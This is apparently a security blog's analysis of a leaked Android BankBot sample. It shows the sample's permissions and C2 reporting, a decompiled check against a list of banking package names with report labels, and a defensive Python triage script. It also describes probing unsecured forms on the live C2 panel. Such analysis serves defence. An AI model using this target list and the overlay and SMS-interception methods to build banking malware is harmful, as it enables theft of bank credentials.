<b style="font-family: Arial, Helvetica, sans-serif;"><br /></b>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com2tag:blogger.com,1999:blog-4220472203730425546.post-32432766177310679172017-06-01T12:43:00.001-07:002017-06-01T12:43:29.529-07:00<b>Android: BankBot.</b><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Some time ago the source code of a <a href="hxxps://forum.exploit.in/index.php?showtopic=113555&st=0">BankBot</a> for Android leaked and spread widely; I think many people have deployed it to test its merits.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">The case I present here appeared about a month ago; the command and control site is still active, but without victims.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">It was said that this version targeted banks in Argentina, so I decided to take a look.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPjbAL7jOqiSaN-h_94kOijj_6U6HF_K4QfEvi4BLdpCrFJG9_QEq2rliqTPsmz69N6D_sRqAV9Wxj4vcz9jzPcPAehGiV_XFBrK4rwHR6FxLTZqWFc5YVVWV_94jYXxTwFcS1LS-bhbc/s1600/00.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="589" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPjbAL7jOqiSaN-h_94kOijj_6U6HF_K4QfEvi4BLdpCrFJG9_QEq2rliqTPsmz69N6D_sRqAV9Wxj4vcz9jzPcPAehGiV_XFBrK4rwHR6FxLTZqWFc5YVVWV_94jYXxTwFcS1LS-bhbc/s320/00.jpg" width="320" /></a></div>
<br />
<br />
https://www.virustotal.com/en/file/1584174767c12ec6896a7cda9ca0656205e2bece916445b2d6e145fb0ae3cb06/analysis/<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5k0_9WXN-2Lext4Kl0ob9aWv-pnP94DwvTrNejIpmqMPjLbO8T6b70NNSm0NWcERxUnDJW_pA_6_1qLz2_iYh5C9yv3f_FE9XFXT9prPUP_8A8UvHs7l1ZXyqg15fx38Cg5EsSx-XCmQ/s1600/Clipboard01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="475" data-original-width="1021" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5k0_9WXN-2Lext4Kl0ob9aWv-pnP94DwvTrNejIpmqMPjLbO8T6b70NNSm0NWcERxUnDJW_pA_6_1qLz2_iYh5C9yv3f_FE9XFXT9prPUP_8A8UvHs7l1ZXyqg15fx38Cg5EsSx-XCmQ/s320/Clipboard01.jpg" width="320" /></a></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">We installed it on an Android emulator; the permissions it requests are plainly visible.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nCmFnTSrubC9Dd63S47Y3kcDwrn91sKKYL1NgKD21rxcijUZCOImBXzdCcCQQKVewzMF44rGF3pvMOFmxCNfzUzJXhZOaljywtXFBCF5_ooqBjcPfe9Dtobp9aJmklOYxFxiUK8sKVo/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="681" data-original-width="394" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2nCmFnTSrubC9Dd63S47Y3kcDwrn91sKKYL1NgKD21rxcijUZCOImBXzdCcCQQKVewzMF44rGF3pvMOFmxCNfzUzJXhZOaljywtXFBCF5_ooqBjcPfe9Dtobp9aJmklOYxFxiUK8sKVo/s320/2.jpg" width="184" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6GPx-4zSzOs5vkmgp7arEilWmCbWsvP-pDaaZYLLHGE8G0ovgqBsjXH4AqvzHolbl1eeAFzZTS_QNf5s02yIAKbxRR5aTMDj6biBQSt7pvrjG7AgLH2Itu2917rGr4LS4zKurBObJq4/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="476" data-original-width="376" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ6GPx-4zSzOs5vkmgp7arEilWmCbWsvP-pDaaZYLLHGE8G0ovgqBsjXH4AqvzHolbl1eeAFzZTS_QNf5s02yIAKbxRR5aTMDj6biBQSt7pvrjG7AgLH2Itu2917rGr4LS4zKurBObJq4/s320/3.jpg" width="252" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here it requests ROOT permission.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe5krlZNIRCBHVnRXoeBKS7lJBxJde8U912RzTNn1OV6Tn0XpW9cQyrDlVc7jNjh_FViCm1rXEhWtdYijFAvDAjmPFr1FRcPObBclm4eEy8O5AGe3xCItrsR4k3rmd7QDMm74v6anf31M/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="662" data-original-width="399" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe5krlZNIRCBHVnRXoeBKS7lJBxJde8U912RzTNn1OV6Tn0XpW9cQyrDlVc7jNjh_FViCm1rXEhWtdYijFAvDAjmPFr1FRcPObBclm4eEy8O5AGe3xCItrsR4k3rmd7QDMm74v6anf31M/s320/1.jpg" width="192" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">The C2 site it reports to, sending encoded data.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguOJwlxKs6eMMZFzQNSuCvxAxQJ_Zd7D736_6qG5TrbDouBn0hUzwMfv1kcwG8DXLEoC44gqLgs2EtprN9Gl3IVTRDIQsqxl_aNtj1SYfo_OxBJTumEOzeEqIbQMU7_J_2NPrOUy5lvi4/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="456" data-original-width="826" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguOJwlxKs6eMMZFzQNSuCvxAxQJ_Zd7D736_6qG5TrbDouBn0hUzwMfv1kcwG8DXLEoC44gqLgs2EtprN9Gl3IVTRDIQsqxl_aNtj1SYfo_OxBJTumEOzeEqIbQMU7_J_2NPrOUy5lvi4/s320/4.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis of the C2:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH0OKLl9yU3sBlzuaKcNW_5BR2Zk5IP8L_kZb9ELM5Zs0Bm_qDtZRP7dxlTUxm_TUnjFvjjZJmavvCyDKjtxYuYMKFt6nNCFDgM0WHrGSXB02x_1izEhq-nIjrljtspOCIWB1SWahZaHg/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="393" data-original-width="931" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhH0OKLl9yU3sBlzuaKcNW_5BR2Zk5IP8L_kZb9ELM5Zs0Bm_qDtZRP7dxlTUxm_TUnjFvjjZJmavvCyDKjtxYuYMKFt6nNCFDgM0WHrGSXB02x_1izEhq-nIjrljtspOCIWB1SWahZaHg/s320/5.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here we can see the messages it writes to LOGCAT:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxDJqNXZhb-dmSVA1-TTZLgE6j5PqdB6ROxezJq1Y7jtDbolJRdUwmbPasZybkNPDi10OUQ6-duh9Pdq6hLqKUzpGMo2fd3Xz6gwrNvK_r1euMb6PDjFDuRlEj3lJdtgJ5ej_1tSbVrBo/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="237" data-original-width="1043" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxDJqNXZhb-dmSVA1-TTZLgE6j5PqdB6ROxezJq1Y7jtDbolJRdUwmbPasZybkNPDi10OUQ6-duh9Pdq6hLqKUzpGMo2fd3Xz6gwrNvK_r1euMb6PDjFDuRlEj3lJdtgJ5ej_1tSbVrBo/s320/7.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqOuxs4_Fk6m1OeKAGkuuQ6uvLU-DWf4r4HUCOT6KQkuxK0Yk2UeWsulZf-0HC40PDcQtMa3QQdlJffegXaji3ngUp68z2XhtfFMlalCve8G0mx9nMgbf7NfYkaE6MRzlua3dK9k3ZX80/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="279" data-original-width="1121" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqOuxs4_Fk6m1OeKAGkuuQ6uvLU-DWf4r4HUCOT6KQkuxK0Yk2UeWsulZf-0HC40PDcQtMa3QQdlJffegXaji3ngUp68z2XhtfFMlalCve8G0mx9nMgbf7NfYkaE6MRzlua3dK9k3ZX80/s320/8.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">We converted the malware with dex2jar-2.0 and decompiled it. This revealed the list of banking apps the malware watches for on the device, so that it can later overlay fake forms and capture banking credentials. It also has the ability to intercept SMS, so it can obtain the security tokens or notifications the targeted bank sends to the victim. Below is the package-name check loop as decompiled, followed by the pipe-delimited label string the bot uses when reporting.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Log.d("INVISIBLE-LOG", "SEARCH BANK CLIENT'S");</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.sberbankmobile"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.sberbank_sbbol"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.alfabank.mobile.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.alfabank.oavdo.amc"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.mw"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.raiffeisennews"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.idamob.tinkoff.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.paypal.android.p2pmobile"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.webmoney.my"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.rosbank.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.vtb24.mobilebanking.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.simpls.mbrd.ui"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.yandex.money"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.com.cs.ifobs.mobile.android.sbrf"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.privatbank.ap24"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ru.simpls.brs2.mobbank"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.ubanksu"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.alseda.ideabank"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("pl.pkobp.iko"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.bank.sms"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.com.cs.ifobs.mobile.android.otp"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.vtb.client.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.oschadbank.online"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.trinetix.platinum"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("hr.asseco.android.jimba.mUCI.ua"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("ua.pentegy.avalbank.production"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (((ApplicationInfo)localObject2).packageName.equals("com.ukrgazbank.UGBCardM"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> if (!((ApplicationInfo)localObject2).packageName.equals("com.coformatique.starmobile.android"))</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|SberB_RU|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|AlfaB_RU|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|QIWI|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|R-CONNECT|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Tinkoff|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|paypal|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|webmoney|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|RosBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|MTS BANK|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|VTB24|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Yandex Bank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|SberB_UA|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Privat24|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|RussStandart|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Idea_Bank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Iko_Bank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|Bank_SMS|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|OTP Smart|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|VTB_ua|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|OschadBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|PlatinumBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UniCreditBank|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|aval_bank_ua|</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UKRGASBANK|</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">|UKRSIBBANK| </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
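<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">As an added example (not code from the post, nor from the leaked BankBot source), the following Python script rebuilds the check that the decompiled loop above performs: it pulls the targeted package names out of a dex2jar/JD listing, splits the bot's pipe-delimited label string, and reports which targeted apps appear in a device's <code>adb shell pm list packages</code> output. The listing excerpt, label string and package list embedded in it are constructed from the post's data; the regex assumes the <code>packageName.equals("...")</code> form shown above.</span></div>

```python
"""Rebuild BankBot's targeted-app check from a decompiled listing and run it
against a device package list.  Added example, not code from the post or the
malware; every sample string below is constructed from the post's listing."""
import re
from typing import Dict, List, Set

# Constructed sample: a few lines exactly as dex2jar/JD print them above.
DECOMPILED_JAVA = '''
Log.d("INVISIBLE-LOG", "SEARCH BANK CLIENT'S");
if (((ApplicationInfo)localObject2).packageName.equals("ru.sberbankmobile"))
if (((ApplicationInfo)localObject2).packageName.equals("ru.sberbank_sbbol"))
if (((ApplicationInfo)localObject2).packageName.equals("ru.alfabank.mobile.android"))
if (((ApplicationInfo)localObject2).packageName.equals("com.paypal.android.p2pmobile"))
if (((ApplicationInfo)localObject2).packageName.equals("ua.privatbank.ap24"))
if (!((ApplicationInfo)localObject2).packageName.equals("com.coformatique.starmobile.android"))
'''

# Constructed sample: `adb shell pm list packages` on an emulator where the
# SberB_RU app and PayPal are installed, as in the post's screenshot.
PM_LIST = """package:com.android.settings
package:ru.sberbankmobile
package:com.paypal.android.p2pmobile
package:com.google.android.gms
"""

# Constructed sample: the label string format the bot reports (subset of the
# labels listed in the post).
LABEL_STRING = "|SberB_RU|AlfaB_RU|QIWI|paypal|Privat24|UKRSIBBANK|"

# Matches both the plain and the negated `if (!...)` comparison forms.
PKG_RE = re.compile(r'\.packageName\.equals\("([A-Za-z0-9_.]+)"\)')


def extract_targets(java_src: str) -> List[str]:
    """Package names the bot compares every installed app against,
    in listing order, duplicates dropped."""
    seen: Dict[str, None] = {}
    for pkg in PKG_RE.findall(java_src):
        seen.setdefault(pkg, None)
    return list(seen)


def parse_labels(label_string: str) -> List[str]:
    """Split the bot's `|name|name|` label string into its labels."""
    return [lbl for lbl in label_string.split("|") if lbl]


def parse_pm_list(output: str) -> Set[str]:
    """Package names from `pm list packages` output (`package:<name>` lines)."""
    pkgs: Set[str] = set()
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            pkgs.add(line[len("package:"):])
    return pkgs


def installed_targets(java_src: str, pm_output: str) -> List[str]:
    """What the bot's 'SEARCH BANK CLIENT'S' loop would find on this device:
    the targeted packages that are actually installed, in target-list order."""
    installed = parse_pm_list(pm_output)
    return [p for p in extract_targets(java_src) if p in installed]


if __name__ == "__main__":
    print("targets in listing:", len(extract_targets(DECOMPILED_JAVA)))
    print("labels in string  :", parse_labels(LABEL_STRING))
    print("installed targets :", installed_targets(DECOMPILED_JAVA, PM_LIST))
```

<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Note that the two lists on the page are not parallel (the bot collapses <code>ru.sberbankmobile</code> and <code>ru.sberbank_sbbol</code> into one <code>SberB_RU</code> label, and likewise for the two Alfa-Bank packages), so the script deliberately does not pair packages with labels by position; pasting the full listing and a real <code>pm list packages</code> dump into the two constants is enough to triage a device.</span></div>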
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">I installed the app of a Russian bank (SberB_RU) on the infected emulator and, hard as it may be to believe, this app detected the malware on the device.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5hoVl1mRy5-uqwz4ONsXBN4b-F1mt8f1BjT2qPUF1X78WD7D40uT7vwNCCwXKRmYTNst6Q9EPNRirswMKCIYgAeXX7Yh1XGQtAuxh-aiB0r_soqKoM9gXf2WOQHBzaws1Ia59JjeytA/s1600/22.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" data-original-width="443" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjl5hoVl1mRy5-uqwz4ONsXBN4b-F1mt8f1BjT2qPUF1X78WD7D40uT7vwNCCwXKRmYTNst6Q9EPNRirswMKCIYgAeXX7Yh1XGQtAuxh-aiB0r_soqKoM9gXf2WOQHBzaws1Ia59JjeytA/s400/22.jpg" width="242" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Separately, we started probing the C2 site to see whether we could get anything more out of it. I observed that there are forms that are not secured, so it is possible to access them and obtain more information :D</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">At the time I accessed it there was only one IMEI.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixRwGHhQhURIXjShO9S4KrBmRRCU2wmCVvZALSwNafLo9O4WQWI_3Q_dNAt3H8erkXIxrR1nmb7tvSSwnl0rexbIBGb6ca64jSn4LSLfZU1YFkVpJc1j3lU_NgJiQlleiYKf6xONvSLFU/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="513" data-original-width="975" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixRwGHhQhURIXjShO9S4KrBmRRCU2wmCVvZALSwNafLo9O4WQWI_3Q_dNAt3H8erkXIxrR1nmb7tvSSwnl0rexbIBGb6ca64jSn4LSLfZU1YFkVpJc1j3lU_NgJiQlleiYKf6xONvSLFU/s320/09.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Here we can see my infected system and its report to the command and control.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHl2qO357A9kB0DDdRLAb2SobGrMA9sTiap-BaQy4c5ONXmB6R2d6IcACjfZjdTPnPts2GU640grncjK0cAI-CJtOyAS6k__fN3GypZGU5aaJptDK4RAzEWAK77rmx4Ew5ouB-_a-2_ps/s1600/21..jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="646" data-original-width="1337" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHl2qO357A9kB0DDdRLAb2SobGrMA9sTiap-BaQy4c5ONXmB6R2d6IcACjfZjdTPnPts2GU640grncjK0cAI-CJtOyAS6k__fN3GypZGU5aaJptDK4RAzEWAK77rmx4Ew5ouB-_a-2_ps/s640/21..jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Under Bank we can see that the malware detected that we have the SberB and PayPal apps installed.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYPK8CYmk1CNTqBgUov3oAN5H7rCzPG7NOJ2q6sdDLK1esHQY23nbqdkara4KrjQtsaEBjqSShppOqJl_OmzsspM2xdJ3568azKxjDOTy7VJSwwHg8DU0cWYrZ2-uNnM3p_Amr5saE2U8/s1600/infect.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="127" data-original-width="180" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYPK8CYmk1CNTqBgUov3oAN5H7rCzPG7NOJ2q6sdDLK1esHQY23nbqdkara4KrjQtsaEBjqSShppOqJl_OmzsspM2xdJ3568azKxjDOTy7VJSwwHg8DU0cWYrZ2-uNnM3p_Amr5saE2U8/s400/infect.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">C2 login panel</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoWX0gM2Wpyt6IebA7IrEKVypO79xin4MGfbQeWeKNAZQDfNj_cTgtmbBQgESwsJPpTfKMc3JGejGSMKAcgfq8REv8pmU45WiVN1d1AH64JpqoPJQt73CqNklQdxqrgsD0SMmS-bxpZdA/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="358" data-original-width="732" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoWX0gM2Wpyt6IebA7IrEKVypO79xin4MGfbQeWeKNAZQDfNj_cTgtmbBQgESwsJPpTfKMc3JGejGSMKAcgfq8REv8pmU45WiVN1d1AH64JpqoPJQt73CqNklQdxqrgsD0SMmS-bxpZdA/s640/10.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
